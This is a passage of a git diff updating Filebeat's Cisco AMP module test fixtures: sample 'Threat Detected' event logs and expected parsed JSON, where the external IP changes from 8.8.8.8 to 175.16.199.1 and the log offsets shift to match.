Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
index 644eb52e4236..1faa7cd6a2ab 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json
@@ -3,7 +3,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -52,7 +52,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -64,7 +64,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -104,7 +104,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 1317,
+ "log.offset": 1322,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -115,7 +115,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -127,7 +127,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -167,7 +167,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 2642,
+ "log.offset": 2652,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -178,7 +178,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -190,7 +190,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -230,7 +230,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 3967,
+ "log.offset": 3982,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -241,7 +241,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -253,7 +253,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -293,7 +293,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 5292,
+ "log.offset": 5312,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -304,7 +304,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -316,7 +316,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -356,7 +356,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 6617,
+ "log.offset": 6642,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -367,7 +367,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -379,7 +379,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -419,7 +419,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 7942,
+ "log.offset": 7972,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -430,7 +430,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -442,7 +442,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -482,7 +482,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 9267,
+ "log.offset": 9302,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -493,7 +493,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -505,7 +505,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -545,7 +545,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 10592,
+ "log.offset": 10632,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -556,7 +556,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -568,7 +568,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -608,7 +608,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 11917,
+ "log.offset": 11962,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -619,7 +619,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -631,7 +631,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -671,7 +671,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 13242,
+ "log.offset": 13292,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -682,7 +682,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -694,7 +694,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -734,7 +734,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 14567,
+ "log.offset": 14622,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -745,7 +745,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -757,7 +757,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -797,7 +797,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 15892,
+ "log.offset": 15952,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -808,7 +808,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -820,7 +820,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -860,7 +860,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 17217,
+ "log.offset": 17282,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -871,7 +871,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -883,7 +883,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -923,7 +923,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 18542,
+ "log.offset": 18612,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -934,7 +934,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -946,7 +946,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -986,7 +986,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 19867,
+ "log.offset": 19942,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -997,7 +997,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1009,7 +1009,7 @@
 "@timestamp": "2021-01-15T10:17:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1049,7 +1049,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 21191,
+ "log.offset": 21271,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1060,7 +1060,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1072,7 +1072,7 @@
 "@timestamp": "2021-01-15T10:17:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1110,7 +1110,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 22515,
+ "log.offset": 22600,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1121,7 +1121,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1133,7 +1133,7 @@
 "@timestamp": "2021-01-15T10:17:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1173,7 +1173,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 23834,
+ "log.offset": 23924,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1184,7 +1184,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1196,7 +1196,7 @@
 "@timestamp": "2021-01-15T10:17:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1236,7 +1236,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 25159,
+ "log.offset": 25254,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1247,7 +1247,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1259,7 +1259,7 @@
 "@timestamp": "2021-01-15T10:17:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1299,7 +1299,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 26489,
+ "log.offset": 26589,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1310,7 +1310,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1322,7 +1322,7 @@
 "@timestamp": "2021-01-15T10:17:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1363,7 +1363,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 27769,
+ "log.offset": 27874,
 "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729",
 "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
 "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1379,7 +1379,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1395,7 +1395,7 @@
 "@timestamp": "2021-01-15T10:17:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1435,7 +1435,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 29385,
+ "log.offset": 29495,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1446,7 +1446,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1458,7 +1458,7 @@
 "@timestamp": "2021-01-15T10:17:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1499,7 +1499,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 30665,
+ "log.offset": 30780,
 "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729",
 "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
 "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1515,7 +1515,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1531,7 +1531,7 @@
 "@timestamp": "2021-01-15T10:17:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1571,7 +1571,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 32281,
+ "log.offset": 32401,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1582,7 +1582,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1594,7 +1594,7 @@
 "@timestamp": "2021-01-15T10:17:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1635,7 +1635,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 33561,
+ "log.offset": 33686,
 "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e",
 "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
 "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
@@ -1651,7 +1651,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1667,7 +1667,7 @@
 "@timestamp": "2021-01-15T10:17:25.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1705,7 +1705,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 35128,
+ "log.offset": 35258,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1716,7 +1716,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1728,7 +1728,7 @@
 "@timestamp": "2021-01-15T10:17:21.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1769,7 +1769,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 36447,
+ "log.offset": 36582,
 "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e",
 "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
 "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
@@ -1785,7 +1785,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1801,7 +1801,7 @@
 "@timestamp": "2021-01-15T10:17:14.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1839,7 +1839,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 38014,
+ "log.offset": 38154,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1850,7 +1850,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1862,7 +1862,7 @@
 "@timestamp": "2021-01-15T10:17:02.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1900,7 +1900,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 39333,
+ "log.offset": 39478,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1911,7 +1911,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1923,7 +1923,7 @@
 "@timestamp": "2021-01-15T10:14:55.000Z",
 "cisco.amp.computer.active": true,
